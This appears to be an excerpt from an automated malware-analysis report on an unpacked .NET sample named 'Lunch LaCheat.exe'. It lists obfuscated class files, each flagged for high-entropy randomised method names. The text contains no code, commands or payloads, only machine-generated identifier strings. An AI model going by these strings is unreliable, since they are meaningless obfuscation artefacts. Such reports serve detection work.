                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, bjx4PUMNvrbRTipVjsL.csHigh entropy of concatenated method names: 'bSGuPSxCqQx8COVogUR', 'IZdvcXxpbntIBs2jPE1', 'wde6TExMAm1KLhlWrIY', 'IqpQkRxEW58S5H1aEn6', 'IWF', 'j72', 'hdI2ScsE9M', 'FTh2DLjhNr', 'j4z', 'APh23kPe0K'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, DNSXGhMxb8hbaZ3ZyOl.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'bHN5MRYiSF', '_168', 'YE1x18tHjJndhXtjI9G', 'Es2Tc8tk1D98Hs9mLfo', 'mjdPxOtgNK89UKGrREt', 'MqejK6tjvtqcoqfFc80', 'rUdYc2tFBN5Bu275YvO'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, mGRo5IqgkpbCevtLJw4.csHigh entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'HlnkvJ7VPsCs6ZsASYh', 'YaUZWc7KWWp7fikmkBL', 'mFT2oW7Y3Kmq8Aaa870', 'T044587JtvcIy7SB7hw', 'PEtD9772RffA43EytyE', 'nCuIXI781myahKHrcWj'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, n5BLl0zub6q1E6cKtB.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'Tr9Fr96QgZuIYdCN7KJ', 'h0hgxw6BnAWv6j2DTTg', 'hrl1Np6I3KlBF7Fw5PU', 'CxNYl1662OsmSNJRpj2', 'KwCnSn67Df9xTZgkGCj', 'bhXF276yG03fALrguhy'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, d1Ms4CUYfOkEyT4rV8O.csHigh entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, zyKIFSUOvZVd5nfJLNC.csHigh entropy of concatenated method names: 'qmhRTovydL', 'MDgRKRD95d', 'oPLRrjc0QR', 'I4ZRnSZmWU', 'EflRWEh8pQ', 'BShREYCj3FSd17ynq3w', 'M1aqNuCkx4yqBE7nkZQ', 'XhX3gfCgCHt5HO7OYOE', 'wlZqSiCFub9p6BpSV8G', 'kk00a4CbebRhf5yS9E1'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, wiSwb7XyiTFNRrZRITR.csHigh entropy of concatenated method names: 'P7f8owehxD', 'oer8EZtJhj', 'UaU8jJEEsk', 'b3M8xOxYte', 'XYR8FBIV12', 'CCe8Qhns0d', '_838', 'vVb', 'g24', '_9oL'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, LyW9xXtR93TyJkM7URN.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'wqRHywrbJ1', '_3il', 'u0lHqijql3', 'gNKHfvtbRv', '_78N', 'z3K'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, JLb518Xu0gr7VgNrdQG.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'yo0hR4v39K', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, zWT2AgqN8s5bxJgQo4x.csHigh entropy of concatenated method names: 'LU4fsRYhw6', 'koYq7XA6VkFOldRJlt5', 'ccRkdYA7c8aLwhFmU7A', 's94O9bABd6YMGKmZJR3', 'spfTZbAIiNkRdF5jqg4', 'kwVPm9AysBEtBOyjXnq', '_5q7', 'YZ8', '_6kf', 'G9C'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, Sb38j9M5TwPKU5E3N8P.csHigh entropy of concatenated method names: '_223', 'ObchL9DfKqx2y8KPI5B', 'zjyL8gDmB4BA5tX7Sfy', 'AwD8o0Dl8nau0GJDmZc', 'KcrNg3DrrGXhKKACSCj', 'doGS2gDDLcw7qKJHgUc', 'BGYtIMDNCUM0F2OihNl', 'KNcso5D3h3X9yXtwoPg', 'EWsr58DtvoPG6EmKuHn', 'hUx1kPDxpqXCnZMBpOj'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, hYxb1wtLnXrN0rRtimV.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, I9vhRHquCQ0uLDtMftj.csHigh entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'm6JOx8yMVT2AMFy8MY0', 'iN5JtyyE8TQ2EHIq3IW', 'abuNRQyCZQ2s77Z74kO', 'UocsYxypvl32uvLQbW3', 'nU3W9ryo2MCKBXibePA', 'Pj5imPyuBcytTng08QB'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, ckfw2rtlq8EL44wGQV0.csHigh entropy of concatenated method names: 'rsKPLncwwW', 'L6sP9D7GLP', 'MY3PpHxxvt', 'DxqPdKmpmu', 'BmxPcxeGN8', 'KNWPTCeMTY', 'UR2PKMeayj', 'EiKPrlj1Li', 'yVFPnZuxop', 'BO6PW9RhMe'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, diijDZfkEAwvm72umcW.csHigh entropy of concatenated method names: 'CsNw8U53TQ', 'lJPbMhmS8Ct7f7ZO0ZG', 'yD6n0FmZlZeDciG0APA', 'OeK0bpmaqdd0OZNZgDw', 'oVKeupms4HPDKNBNLGA', 'Sbvr4MmVIw5cXP5kZdL', 'mmFw3GkEYg', 'sEAwshq5Hq', 'Db9w47p6oR', 'waSwV8Ztq9'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, w22xDBMq7bbo3Ga2veg.csHigh entropy of concatenated method names: 'a1vwCr4fti', 'H9mw0we9aC', 'H0awGgssIu', 'yMIwbRkDE9', 'WYHFxumzDsJZ9jDMjSS', 'jEYH21m8eJJ0NNVD1em', 'Yvp70SmGvJRg5At98tT', 'wyuwNBl5bUYGD9NeyHR', 'DttIPmlcBQFUZdNx5p9', 'U98xMblnDjicSGj2F1B'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, whZPVLpQKsuh7sYp2i.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'usrtRen8XF05jgBeSKi', 'iA6vWdnGYWrQkMlHeC4', 'l7OCiwnzMUcQmb87Osk', 'nC8VUBQ5xMr7HXTLLeK', 'uhMiPYQcaVJ4N9J6BUD', 'xMoQmfQnNypsK1NrACC'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, U9iiGtqq03BTIAdKv3Z.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'MWp64P6l3ipq2GQuntq', 'NKk4Cp6rF0ol1VXhsFw', 'qMa3Jf6DVGAjhyhE3Gk', 'CQ7w8K6NJoBOIue0qoV', 'W5ZNGH63RabL7XgnpOX', 'ciHJmY6t1kLtuVC1IHH'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, a8RCXJfyfv2YevbKcJy.csHigh entropy of concatenated method names: 'B1if86EUeO', 'S19fhnlUDc', 'q8LfOHkBZc', 'i8PI4bAvDM9b9C1Xgh1', 'Cjs6HFALJ6AotLk64Gn', 'k7tPmVAMa10WT9riQZC', 'RK6pTsAE4SL2ivvxpdm', 'A6du3SACOq2v6xgKLiP', 'Jh5fROApOWD9HUyQRqh', 'VakGRmA1KCKrxMSk1r5'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, HhoQgiQALbTCJrMygA.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'QiiUNSIXBAa3MTvUOCu', 'FMZ4lwIWh3SWU7SMwhc', 'Dvab0iIwYdJln3b6nk9', 'QBsabpIfvHk0tYu8ngM', 'CGH9NqImjKdoJaB95FM', 'MjsYO4Ilq6RGO1ZSVb9'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, COtroIUMm4eTIhOVxcs.csHigh entropy of concatenated method names: 'TuZJLpv3X3ZUXuQfMa8', 'DF0hVAvt5o5TjW3LAAV', 'CbpBQ2vDPJtbSFjQn9Q', 'K06NIQvNmxcx4okoToY', 'pU54RJwarE', 'qNaD9IvkyZLLLSYXZ2n', 'VaPEBQvglhuPkTng7gV', 'IN55Q0vxkE4ufGioIQp', 'oqy7ePvHEFuZLvApOym', 'CwS4T7vjvRGJ6EdnGY3'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, vf0yC3MIHlCBxsJ9ID0.csHigh entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'tpM09X3i2kDDKar9Dx1', 'Jf8Z0S3PleVt01dPpCm', 's3WKbg3X3ht23eatxyW', 'zs5Vnd3WtIuHS3SNqll'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, DNaNPDq8ZrMGeZQIvVs.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'E8lgLoy4DIupouCkFA4', 'qfMJ48yZiBo1MF6E6xD', 'Dnsdi7yadExYH8nmDvK', 'aaZ2GJySG17b0RKM8v6', 'ruelhNys0Mlegy5yhFb', 'EmpKriyV2eww67jAxOj'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, yDct3lUiBGykwYgZyNe.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'Ywp8uokPlx', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, kNoIPAUkfQUI8omLQgL.csHigh entropy of concatenated method names: 'FBq8eOs3Gj', 'iYk8aS7c0M', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'BhA8CKD54d', '_5f9', 'A6Y'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, JrnQWOUZjgUWBocdi9j.csHigh entropy of concatenated method names: 'MBRR4bRWZh', 'dljRVGDLuG', 'beok0xEKNU8oE97cVXm', 'gdJirtEYGwQsYO7TH7X', 'G79xv5EJNEIAhGT5SiY', 'QoDxrPE2nhOSeIhOmfP', 'K3u9F7E8gfcuJwL8ZKH', 'XY1BBlEGogCG7BLkJjZ', 'IWvHJ4EzyO62oyRATuK', 'ooaaDoC5R7I1otPmy6D'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, bakGY7MAQ9F1Mugfu6e.csHigh entropy of concatenated method names: '_5u9', 'spk5eP4tNn', 'TM82y63WOc', 'xlo5n38cPv', 'ijDmsq32Cuo0nkm71h4', 'pmmlbH38FgC7IgeCmJx', 'NW4GNa3GCqSCis5YyYb', 'mWl4Li3YuWPoZcZMbjd', 'km51sx3JGusXZGV2HKS', 'qjQnvL3zVIiVitrQV2c'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, xDRQIuqra1CCiX6RhhC.csHigh entropy of concatenated method names: 'WoGfqhwXAd', 'YrnffWIkRQ', 'r7XfMuFUTP', 'PYTUgp9slmjF66T3pwk', 'Ia5Xxi9Vf27RNkwaMvK', 'WrE7er9aBcWYBHcsRZ6', 'TaeQa99STGLKXrARlj9', 'aPsyRx9KgUfkIPH8rdh', 'KFxKGc9YHNCliTOGYpD', 'QgrFic9JXw9Kxa2Ttx1'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, nfeO3JM26UEN4nRJB4s.csHigh entropy of concatenated method names: 'ryxJ1InLAp', 'RHUJ9E29Lj', 'oSNJpITRLy', 'G2fDwUDPjNV9ZqkedFq', 'syRVjODRUQgkNx8k4KP', 'MG67KADi32EoMii2f3c', 'sT2QmfDXYPr5JaU64AZ', 'QOpJ7GmX6g', 'QfIJgjDLxw', 'acyJSkOeR2'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, u7wHE5XO1AwJPYHADRh.csHigh entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, wvbMxJXf3x1mW0ua4by.csHigh entropy of concatenated method names: 'vqbhJIrxhk', 'XIphZm7Lvs', '_8r1', 'ld4h2Y3rX2', 'Rw8hBdLFuK', 'D4Vh6BjHGm', 'ctAh5E2Uxm', 'sglmWPuWU0lZAiHDmmf', 'ORxqW4uwxm5BQ07tA5t', 'w4VfNvufi4GME3bSXCO'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, AjATmTqxd3qnyspZ8M5.csHigh entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'HRIIYd0DFlTC15rYUVP', 'mfIPn10NrKEZSHpfdli', 'PNnWnR03P9hG97s8Bl3', 'jSP2Cd0tWTrMIgKLQvC', 'HqKcYM0x20fOVq54Itl', 'RtP49V0H5kTojw65eOq'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, tuX3ojf34ChaxjRV6c1.csHigh entropy of concatenated method names: 'ghyMzmrMjj', 'GmityahLUc', 'XnGtqsvKl7', 'CwUtfEAeQC', 'gjXtMu01OW', 'J2Attg8s5b', 'QJgtUQo4xj', 'q40tXDejK9', 't9HtwGj4xZ', 'oEntJkXhwB'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, dTG2gXqPUXjsYC5a9HK.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'gfA0Ju7oAp3APN5QL3C', 'eZuBA77ufnak5Wpyrgk', 'Dw99V67ha1rIRYe4Vq3', 'Hntrf37TKJpcDOdMdxc', 'jTckxA7UpNRoPA5bZOJ', 'XRP1sP7eydMZwiP1WHa'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, sHZJEsfKSVh1hmkvGfT.csHigh entropy of concatenated method names: 'zu5XJPnKAU', 'zwnXZTO1PP', 'doVHscfY2QU7y7n3M6h', 'DHJBGlfJchy0NpVeDY1', 'LdV8eMfVkHTJJlF33VL', 'bBU0WFfKxvYr9Xmxf1T', 'WijXSDZEAw', 'MrPWHnm50A7nn7X0Nbk', 'YvnqISmcdn5vSrLYj2i', 'LMfGohfGAKwhojfkFgx'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, COhgSqfcQyyy2PSOJQt.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'VSZU9M3hJ2', 'C35Upi0Ohg', 'pqQUdyyy2P', 'pOJUcQtL6R', 'CIsUTckToo', 'YXanqqfqhHSyA5ZR5IF', 'tOWOCQf9atQ2ptEERAZ', 'qlcaEGf7oTCAAyOB3oA'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, IYPXUgwBGoP6ag9jkCy.csHigh entropy of concatenated method names: 'c2HFvottUIahn', 'woorDbdXE0xTAYhMF0X', 'uNoJwbdW3AWhGTAQrxp', 'VnGffcdwfhM8aLCcLn8', 'SdFVEVdfu82GL510GMs', 'H9mrWodm0RYjQ0ahgOh', 'IIbfdRdixl71rfT5QOD', 'vAv2eFdPIA5BilCQAop', 'axohCLdl4aoI35uNqyP', 'rPVPQkdrFr6cLrseYA7'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, KhVMlxXdSTGZrYZBTyq.csHigh entropy of concatenated method names: 'kjMacqd8Y1', 'dFM8QiUbOiNT3Wlx0o2', 'pAyrlDU1lyp62ZjBqB9', 'C38oNPUj1lyraUDysZK', 'w6QCLhUF0jmyoJeOycs', '_1fi', 'ILXeQHPI2t', '_676', 'IG9', 'mdP'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, kMDXZWXajKvT3fbPySM.csHigh entropy of concatenated method names: 'so7OZOmXcS', 'seBO2wr13U', 'Wx0OBVxFAh', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'BgAO6GC7rc'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, t7eqoCq0pyA24xXUAbH.csHigh entropy of concatenated method names: 'evhqoFZ4P6', 'JsQfJC9ns5pCW5j6Tnf', 'JAoZp69QZvQqimDDTpb', 'pCKSdX95nALImpr7vLg', 'Y3k8MI9cPRFS30v5Oyr', 'UVr5F79BUJGC0yGL74u', 'wo6Vld9IE4g2E8H1jLL', 'B63ltQ96yh2GL5gwWIl', 'oiAqjLbTCJ', 'ECTyE49qwm3bGTHUN6L'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, LdmVhiXGwe9HapiwJ8M.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'TAXO8Cmnut', 'vrLOhm8dlH', 'lcQOOs0Sxx', 'zIYOeFJCIF', 'R5aOahOv5j', 'PslOCWUtKC', 'et4lt6TCIDuEr6rKuQq'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, UhmLkBf9fCvwgVYUfIA.csHigh entropy of concatenated method names: 'qlhUCmLkBf', 'AAWA8rw8JUlo7bj2IaY', 'aX3CKrwGKWf2XWiRpaP', 'KBeZMSwJJIVXm09Apou', 'hyc9HQw2JR8whLRhLc7', 'n00GNtwzblx8nC54JSQ', 'aeNhdAf5DcNWWJ3tCm5', 'kJ3fdTfcnhvxlTjh2c9', 'xKmModfnBy0oOACwRu5', 'hdv74ffQZ2tmZ3HEhpS'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, GmeW25faKmNu3TDH8lC.csHigh entropy of concatenated method names: 'm6ItLu1ZjH', 'WVLtkWQbIi', 'iQ4tzxuYYV', 'VkDUyUfoJr', 'varUq8YInh', 'Bv1UfxxBty', 'jpeUMd3Gwn', 'ffrUt61Kw5', 'EYYUUZrHdC', 'KfNEPTWYJNYa4KaQ8lI'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, AM3dUaMPMLKtx58w5dK.csHigh entropy of concatenated method names: 'AOVJWefvU5', 'VUSJAFTekW', 'QAXJopur5Z', 'f8kJE1fDDg', 'mNZBiUDLQdo7fX17ZBY', 'wGIy5jDMdiueJuQpas0', 'W3TALFDEgsuXNX9Z2is', 'AT5QLEDOyuw53EOOgdu', 'pruHwBDvqlqlFTXC7gs', 'gww8HDDCKEfkOOWGwbE'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, EU7jgPqZUfCh0MEvB0O.csHigh entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'JTKaa4777mfR36hCoHA', 'CpD0lE7yQdshseIwquJ', 'iH8cej7qsWR75prafpN', 'IZHsn479V12L7VHBJSQ', 'BgoW2570jjuUXFQBHNp', 'DUnnj07Ato88UNW52uw'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, Ahc13dEy5KVP0BqE5E.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'hAMy1mBUDwEx2rXOl6l', 'loUJM1BeEu05t5cAgSC', 'xLwah6BdvRdcaJCgeFK', 'zIsF8oB4Ohst4mZHOyW', 'mDtiQxBZULvupYnONMx', 'vF1ADbBaBIOnm7Prudn'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, LgEDIqhS04Car44Mop.csHigh entropy of concatenated method names: 'NJU99NQHq', 'RsnpVi0BZ', 'aAbdKrsDq', 'N3wegKcpgHwR2rr6u6Q', 'pYUR3lcEmMv2RIKJGbt', 'RYkQYscCtfQBwZ1qBsZ', 'py1TVDcoUrIscPVoM4j', 'n1yueqcu6FT4hHhRbcA', 'ejkrQIchrKMglcNdyH3', 'o80D58cT8bTeg0STeY8'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, TKA1axtODGwCsrAJYh2.csHigh entropy of concatenated method names: 'Dh9H1AxGpk', 'ULMH9RCGyd', 'Cx4Hp0QPMN', 'Ws7HdhJ44i', 'x8EHc1HL9o', 'rvHxM6glc1lvMehJWYV', 'RM55FGgfhTvBvTKUYZc', 'UOdxNegmV0i8bkOLHSx', 'gx7WIkgrCmroZnH364u', 'PgomNSgDf3esDNSHfV7'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, f8k1fDtZDguyRu368hC.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, SUHxo9tNj7gNTsIAV05.csHigh entropy of concatenated method names: 'ASg78iHlfC', 'JRI7O6QNB4', 'oHo7HOv6uy', 'PSQ7PChfg4', 'GQh77QXcEE', 'luM7g4nfsA', 'Rp47S9GewM', 'wvG7DiND8G', 'KHj73v7iMn', 'MNF7s8pjhS'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, B0A2YIMzsWk7TS3uGdI.csHigh entropy of concatenated method names: 'QTZ2eYxb1w', 'MXr2aN0rRt', 'WmV2CoLnj2', 'TScQVcxhu1qXlhrMr6t', 'PjP3fgxTEVoLdOOUAtu', 'mS7e1FxokiJEbe4YJnK', 'dplGFjxutbvFpXvFTTi', 'vRoDi4xU3vHRgsJ91bH', 'wBhsrsxeOfq7uBa21LJ', 'ciuqhXxdPoS2OJgR3ju'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, yhRfLWt3k6bdGWArgmH.csHigh entropy of concatenated method names: '_7zt', 'Y2d5s7UQpN', 'L1I540HfXH', 'faI5VYRTcn', 'wS15I7tZAN', 'U1c5mxNXvh', 'Hg45uEn0ui', 'YqOicPk3qIJeIYTLNQ6', 'RowPfGktZ4vKdmJ6ayU', 'rOFyxvkDgj86hX7gl20'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, eCD4fOt5DPq948iwBGO.csHigh entropy of concatenated method names: 'erL6pJNwl4', 'tfI6drG2CP', 'C6N6coIPAf', 'SUI6T8omLQ', 'oLr6Kbe96U', 'MWA0wjHGk5xg7L7C3eq', 'Cic4tYHzZ5EcG8VYmr7', 'X7giRhH2Nb6hPeHOJjT', 'G7dIpfH8Om3Lwn6sjKJ', 'vTaFAWk5NyM67DkM9Ki'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, Vb95fHU00YbhYDyu0gn.csHigh entropy of concatenated method names: 'qw5RjX5E4u', 'WK7RxA3kvh', 'DlyRFaKs7R', 'zaAZ6uCuOTrQQCO836R', 'dOL0plCpeVIMNhkew1d', 'BXmpOuCoUwnUe5BCqio', 'P6QUBJChv4C6xiEa0O0', 'jKMcgZCTWOkPwYQSAdq', 'pxHyKRCUvWKMttg2kcZ', 'NNfEdpCe43h4k4Xao3h'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, VMFniGxPuBqy8bufcO.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'zPLBIJI6EAx2AuarbQN', 'a8VU2NI7hlQURo19q9X', 'Sem2FAIyQ0lGs9g5Jv3', 'mNTkmRIqiiVNQEglCu2', 'VHvEa4I9VtmwOVg7hUC', 'RFU3TgI0utCXWLQGj4R'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, qlXAoh1gngc2opxxXE.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'aylWtpi92', 'bkRHbAnMkiHllHmNCPr', 'zfe9y2nEZHlKM4NJHNc', 'ySuEJOnCRbb7HMHeWFd', 'bjiC8nnp0SmrslLefZW', 'oTUm6dnoR9vFeGY0KSB'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, ScE4clqkd8XEwfbUW0Q.csHigh entropy of concatenated method names: 'OH3fmYWQbU', 'njgfuPUfCh', 'CMEfRvB0Oc', 'lYYCbQA0gq0hdyRggSO', 'jA3j8uAqlS3WG0i99jj', 'BAUOatA9ivHQqX57BbY', 'fPfRJmAAPsbnU2HAHFy', 'zpOlMpARosx03mAD4Fm', 'xatfDuAiR0j7IYdrLRh', 'IACDsBAPpipjifvZXUl'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, USnMqttFK6BlomrJdIc.csHigh entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'GjkP7CybKT', 'XmhPgyvQWU', 'r8j', 'LS1', '_55S'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, h6vuwetSTCvG7UVGrTy.csHigh entropy of concatenated method names: 'QXj5tbqNGh', 'EHN5UH0y3X', 'Niq5XVfIUT', 'pZaAH1kw9m1BCP98Ddp', 'dYDMN1kfqlvFXkd8234', 'lh7iiZkXQpwkl5pn0BU', 'gVrcfykWg6G2SRfcUtA', 'sAYATckmVN2tioX9gJ0', 'uSPpnyklCeAGqHelk9u', 'G3Zg4mkrR64KQ4AJyYl'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, r70NTtMtM1uhGa8tvNh.csHigh entropy of concatenated method names: 'ba8wnj0pnM', 'dQ6wWL6GZO', 'HPBwAC7FAa', 'qqmwoRnjG3', 'TsdwE0WyU9', 'icWwjffg5Z', 'J8irNElFIn7Wn6y2175', 'U6uf2Nlg2avZgNruTKk', 'QeO9Nllj2DyE3o8HkOT', 'UMm4x9lbpKZ5oTtANUS'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, mBP0oLLioGhwXAdkrn.csHigh entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'RD4vFCIKLIHllJerkY6', 'uvCP9wIYLrArEjhk36T', 'l3o5nHIJZ6Zu4y1Gyib', 'mo1tbvI2Zx5AqH6r5ZN', 'FIakaWI86otfJgW9sxD', 'cDlgDBIG7OAMCa9t6E0'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, KHdCRefmbkXs3K6gETN.csHigh entropy of concatenated method names: 'U2ttViaejt', 'eHqtIYFZSi', 'Yf8tmR0mCh', 'dKftuZJaha', 'YNotRMtWH5', 'vAiHkRW5DW67my42vGf', 'DGMhAhWcfBjt63gg8Ji', 'iFGOBvXGAF29XqhO46h', 'BQh4G0XzrsbXQeLGmKA', 'UH7Zw5Wn3n8D3mhT9rP'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, LMjjpmqliahLUcLnGsv.csHigh entropy of concatenated method names: '_589', 'YZ8', '_491', 'G9C', 'KfdqIZ0a3759TGBu5PR', 'dc2KE40SB5kdmDO36nt', 'WukPRJ0sGktsPStdt1N', 'XWbLkl0VAVrl3ZWaPF6', 'w2H7td0KNICT7stNJ3F', 'xYLhGd0YOhdnj9i3HJK'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, fttbW4MDcJoMNSH5luT.csHigh entropy of concatenated method names: 'qJXJYpW99r', 'J2gJldmVh1', 'GHjJvt3wrp', 'bk1JN6UCD4', 'bODJiPq948', 'hGmGUUN6i8Q9mATGUco', 'k5v9pUN7Av8ih4vYORN', 'mv1KLuNB9ITBxXnAx9k', 'k15qJMNImxrfpVGCfQW', 'JcDtgkNyl5ay1YPElJX'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, DAsN0KqaOCtdgS3tEyf.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'M6bISbqElc2gBTqnY69', 'gv7VZ3qCnc1PaSvp2Ir', 'aPJVY0qp1Ytv8ghp49E', 'hGXX9LqovAi91ujCX4d', 'YmHOsCqu74Uti3CRdZN', 'SlDBkJqhuCrggQ7uDub'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, UlZg75qsQwJiM21bO65.csHigh entropy of concatenated method names: 'lHIqCRnmAO', 'vMgMF0yfJ8TikhX2JrH', 'y0HOBuymjT37Y7qUx2h', 'w22e1AyWFE8HZhM0DNL', 'ANdsv9yw6wD9muTxSB5', 'twyKcYylT8BWuQF1YcT', 'saTZbGyrug8BVIVsd20', 'P92crFyDmlOTLF4bFuE', 'LNu749yN3gnq0LspyUI', 'f28'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, B0aWXNMnlXn2BLGMp6h.csHigh entropy of concatenated method names: 'sg9', 'Ulq51Ji3mp', 'AJXZLAKlpa', 'thE5H3BDVC', 'sTtO0B3ZeCiOkoYtyRi', 'fAqy4B3a2PsP4Csb2GE', 'vtMweA3SARa1hcsJZst', 'OiSpfI3dk3Lt4obXW8F', 'AJuwmF344OoGZRVvedm', 'YawJpm3sYwIUgtktTEe'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, gI07OVUv4aW9pt78401.csHigh entropy of concatenated method names: 'wsB8tf822i', 'VUf8UA23TH', 'dQj8XeOEdi', 'LwO8w8sMco', 'sR58JxMG3p', 'kfR8ZR3xYr', 'fmk82qvu9R', 'riu8B4g1M9', 'kQk86mZJwj', 'RKe85rMYEe'
